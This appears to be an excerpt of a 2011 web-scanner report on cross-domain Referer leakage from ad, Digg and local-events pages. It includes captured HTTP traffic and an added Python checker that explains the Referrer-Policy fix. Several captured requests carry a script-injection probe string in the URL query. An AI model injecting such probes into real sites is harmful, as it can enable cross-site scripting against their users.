Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,14:951,7,14;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Sat, 29 Jan 2011 13:40:40 GMT
Date: Sat, 29 Jan 2011 13:39:46 GMT
Connection: close
Content-Length: 4378

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856421/direct;wi.728;hi.90/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.183. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.4859021785669029 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196646,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Sat, 29 Jan 2011 13:40:40 GMT
Date: Sat, 29 Jan 2011 13:39:46 GMT
Connection: close
Content-Length: 4388

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856420/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.184. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /submit?phase=2&url=http://www.bostonherald.com HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:29 GMT; path=/; domain=digg.com
Set-Cookie: d=77e17940db831f181383a5bb3cb5c736d63ecf04d0fe3deac9bb624c4d81a73d; expires=Thu, 28-Jan-2021 15:33:09 GMT; path=/; domain=.digg.com
X-Digg-Time: D=37770 10.2.128.190
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7660

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">


<link rel="stylesheet" type="text/css" href="http://cdn1.diggstatic.com/css/library/global.5b83bc1a.css" media="all">
<!--[if IE 7]>
...[SNIP]...
<![endif]-->

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/App_Submission/index.c3c738bb.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.surveymonkey.com/s/ZNBQMYJ" id="feedback-bar-survey">Take the survey</a>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/lib.b29284a6.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

17.185. http://events.cbs6albany.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:
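Every Issue detail from 17.178 through 17.185 states the same rule: the request URL carries a query string and the response embeds a resource or link on another domain, so when the browser fetches that resource the full page URL, query string included, travels to the third party in the Referer header (the d7.zedo.com requests above show the effect from the receiving side, with bostonherald.com's processAds.bg query arriving in their Referer). The Python below is an added example, not the crawler's or Burp's own code; it re-implements that rule over a constructed request/response pair modelled on finding 17.185, and its registrable-domain helper is a deliberate simplification (last two labels, no Public Suffix List).

```python
# Added example: reproduce the "cross-domain Referer leakage" check that the
# report's Issue detail entries describe. Not the scanner's own code.
import re
from urllib.parse import urlsplit

# Absolute http(s) URLs in src= or href= attributes. Relative URLs stay on the
# same origin and cannot carry the Referer elsewhere, so they are ignored.
# Limitation: URLs assembled in script or in CSS url() are not seen.
_ABS_URL_ATTR = re.compile(
    r'''(?:src|href)\s*=\s*["']?(https?://[^"'\s>]+)''', re.IGNORECASE)

# Referrer-Policy values that strip path and query from cross-origin Referers.
_QUERY_STRIPPING_POLICIES = {
    "no-referrer", "same-origin", "origin", "strict-origin",
    "origin-when-cross-origin", "strict-origin-when-cross-origin",
}


def parse_request(raw_request):
    """Return (method, host, request_target) from a raw HTTP/1.1 request."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target, _version = lines[0].split(None, 2)
    host = None
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            host = value.strip()
    if host is None:
        raise ValueError("request has no Host header")
    return method, host, target


def parse_response(raw_response):
    """Return (headers, body); header names are lower-cased, repeats overwrite
    (good enough here, since only Referrer-Policy is consulted)."""
    head, _, body = raw_response.replace("\r\n", "\n").partition("\n\n")
    headers = {}
    for line in head.split("\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def registrable_domain(host):
    """Crude registrable domain: the last two labels. A real scanner would use
    the Public Suffix List so that names like example.co.uk are handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def cross_domain_links(request_host, body):
    """Absolute URLs in the body whose registrable domain differs from the
    request host's, sorted for stable output."""
    own = registrable_domain(request_host)
    found = set()
    for url in _ABS_URL_ATTR.findall(body):
        target_host = urlsplit(url).hostname or ""
        if registrable_domain(target_host) != own:
            found.add(url)
    return sorted(found)


def check_referer_leak(raw_request, raw_response):
    """The report's rule: query string on the request URL plus a cross-domain
    link in the response means the query string reaches the other domain in
    the Referer header, unless a Referrer-Policy header strips it."""
    _method, host, target = parse_request(raw_request)
    headers, body = parse_response(raw_response)
    query = urlsplit(target).query
    links = cross_domain_links(host, body)
    policy = headers.get("referrer-policy", "").lower()
    suppressed = policy in _QUERY_STRIPPING_POLICIES
    return {
        "host": host,
        "query": query,
        "cross_domain_links": links,
        "referrer_policy": policy or None,
        "leaks": bool(query) and bool(links) and not suppressed,
    }


# Constructed sample modelled on finding 17.185. The marker in the query is the
# scanner's probe string; the finding is about where that string ends up.
SAMPLE_REQUEST = (
    "GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 HTTP/1.1\r\n"
    "Host: events.cbs6albany.com\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html><head>\n"
    '<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>\n'
    "<link href='/partners/css/150.css' media='screen' rel='Stylesheet' type='text/css' />\n"
    "</head><body>\n"
    '<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />\n'
    '<a href="http://www.omniture.com" title="Web Analytics">Web Analytics</a>\n'
    '<img src="http://events.cbs6albany.com/images/logo.gif" />\n'
    "</body></html>\n"
)

# The same response with a header that keeps the query string at home.
HARDENED_RESPONSE = SAMPLE_RESPONSE.replace(
    "Content-Type:", "Referrer-Policy: strict-origin-when-cross-origin\r\nContent-Type:", 1)

if __name__ == "__main__":
    for label, resp in (("as captured", SAMPLE_RESPONSE),
                        ("with Referrer-Policy", HARDENED_RESPONSE)):
        result = check_referer_leak(SAMPLE_REQUEST, resp)
        print(label, "->", "LEAKS" if result["leaks"] else "ok",
              result["cross_domain_links"])
```

Run stand-alone it reports LEAKS for the captured form and ok once the Referrer-Policy header is present. Two caveats when reading findings of this kind: the probe string in the query is the scanner's marker, so the finding is the leak of whatever the query holds (search terms, tokens, or an injected payload), not evidence that the target executes it; and current browsers default to strict-origin-when-cross-origin, so a leak like the 2011 capture above now requires the page to opt into a laxer policy such as unsafe-url or no-referrer-when-downgrade.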

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 02:01:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 71
ETag: "eed8e5ffca5c38eb679d9e31a9c3a697"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=FEftj6b0hOTE3Zp5_y4l5Q.100055477; path=/; expires=Sun, 29-Jan-2012 02:01:35 GMT
Set-Cookie: zvents_tracker_sid=FEftj6b0hOTE3Zp5_y4l5Q.100055477; path=/; expires=Sun, 29-Jan-2012 02:01:35 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYjQwZTRhZjhjYmEzYmVmMmU1NDM0NDBlMzcyNmFiOWMiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--4930ba074640b4fd1a6cc5de2e1bcb0c85dac8cd; path=/; expires=Fri, 29-Apr-2011 02:01:35 GMT; HttpOnly
Content-Length: 49204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>


<link href="http://js.zvents.com/stylesheets/happy_default.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href='/partners/css/150.css' media='screen' rel='Stylesheet' type='text/css' />
...[SNIP]...
</script>


<img border="0" src="https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=">

<!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY -->
<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
<a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?65617" /> add to our listings</a>
...[SNIP]...
<a id="rotation_prev" href="#"><img alt="Previous event" src="http://js.zvents.com/images/icons/orange_rev.gif?65617" title="Previous event" /></a>
...[SNIP]...
pt:void(0)" id="featured_rotation_pause" onclick="$ZJQuery('#featured_rotation').cycle('pause'); $ZJQuery('#featured_rotation_play').show(); $ZJQuery('#featured_rotation_pause').hide(); return false;"><img alt="Pause event slideshow" src="http://js.zvents.com/images/icons/orange_pause.gif?65617" title="Pause event slideshow" /></a>
...[SNIP]...
ed_rotation_play" onclick="$ZJQuery('#featured_rotation').cycle('resume'); $ZJQuery('#featured_rotation_play').hide(); $ZJQuery('#featured_rotation_pause').show(); return false;" style="display: none"><img alt="Resume event slideshow" src="http://js.zvents.com/images/icons/orange_play.gif?65617" title="Resume event slideshow" /></a>
<a id="rotation_next" href="#"><img alt="Next event" src="http://js.zvents.com/images/icons/orange_ff.gif?65617" title="Next event" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/139733045-pink-floyd-experience" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:139733045', false, this)"><img alt="Pink Floyd Experience" src="http://www.zvents.com/images/internal/0/2/0/9/img_459020_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/142549185-lisa-lampanelli" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:142549185', false, this)"><img alt="Lisa Lampanelli" src="http://www.zvents.com/images/internal/8/0/5/4/img_74508_primary.jpg?resample_method=resized" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/151637365-riverdance" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:151637365', false, this)"><img alt="Riverdance" src="http://www.zvents.com/images/internal/7/6/5/8/img_348567_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/147270025-glenn-beck" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:147270025', false, this)"><img alt="Glenn Beck" src="http://www.zvents.com/images/internal/5/2/8/3/img_8063825_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/155300665-celtic-woman" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:155300665', false, this)"><img alt="Celtic Woman" src="http://www.zvents.com/images/internal/7/3/2/5/img_155237_primary.jpg?resample_method=scaled" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/154912025-mike-epps-and-friends" onclick="return Zvents.tracker.notifyFeaturedClick('event:154912025', false, this)"><img alt="Mike Epps And Friends" border="0" src="http://www.zvents.com/images/internal/6/4/1/8/img_868146_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour" onclick="return Zvents.tracker.notifyFeaturedClick('event:155222925', false, this)"><img alt="Keith Urban - Get Closer 2011 World Tour" border="0" src="http://www.zvents.com/images/internal/5/8/6/4/img_8914685_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/152086945-harlem-globetrotters" onclick="return Zvents.tracker.notifyFeaturedClick('event:152086945', false, this)"><img alt="Harlem Globetrotters" border="0" src="http://www.zvents.com/images/internal/5/8/9/0/img_2640985_thumb.jpg?resample_method=scaled" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/161020605-an-evening-with-cesar-millan-the-dog-whisperer" onclick="return Zvents.tracker.notifyFeaturedClick('event:161020605', false, this)"><img alt="An Evening With Cesar Millan: The Dog Whisperer" border="0" src="http://www.zvents.com/images/internal/5/0/3/8/img_9628305_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb" onclick="return Zvents.tracker.notifyFeaturedClick('event:148455425', false, this)"><img alt="Sesame Street Live &quot;Elmo's Green Thumb&quot;" border="0" src="http://www.zvents.com/images/internal/5/2/3/8/img_8188325_thumb.jpg?resample_method=" /></a>
...[SNIP]...
733045-pink-floyd-experience" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:139733045'
, 1, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ow/142549185-lisa-lampanelli" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:142549185'
, 2, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ts/show/147270025-glenn-beck" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:147270025'
, 3, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
treet-live-elmos-green-thumb" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:148455425'
, 4, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ts/show/151637365-riverdance" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:151637365'
, 5, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
2086945-harlem-globetrotters" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:152086945'
, 6, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/162869785'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/163938585'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/164180885'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
</a> | <a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false" class="fLinks">Privacy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false" class="fLinks">User Agreement</a>
...[SNIP]...
<div id="zpwrdby">
<a href="http://www.zvents.com/albany-ny/events"><img src="/images/zPB.gif" alt="Zvents - Discover things to do" border="0" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->


<img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" />
<script type="text/javascript" charset="utf-8">
...[SNIP]...

17.186. http://events.cbs6albany.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 43
ETag: "3438eef8566da91c0a816f482d081bc2"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT
Set-Cookie: zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Thu, 28-Apr-2011 17:37:18 GMT; HttpOnly
Content-Length: 50101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>


<link href="http://js.zvents.com/stylesheets/happy_default.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href='/partners/css/150.css' media='screen' rel='Stylesheet' type='text/css' />
...[SNIP]...
</script>


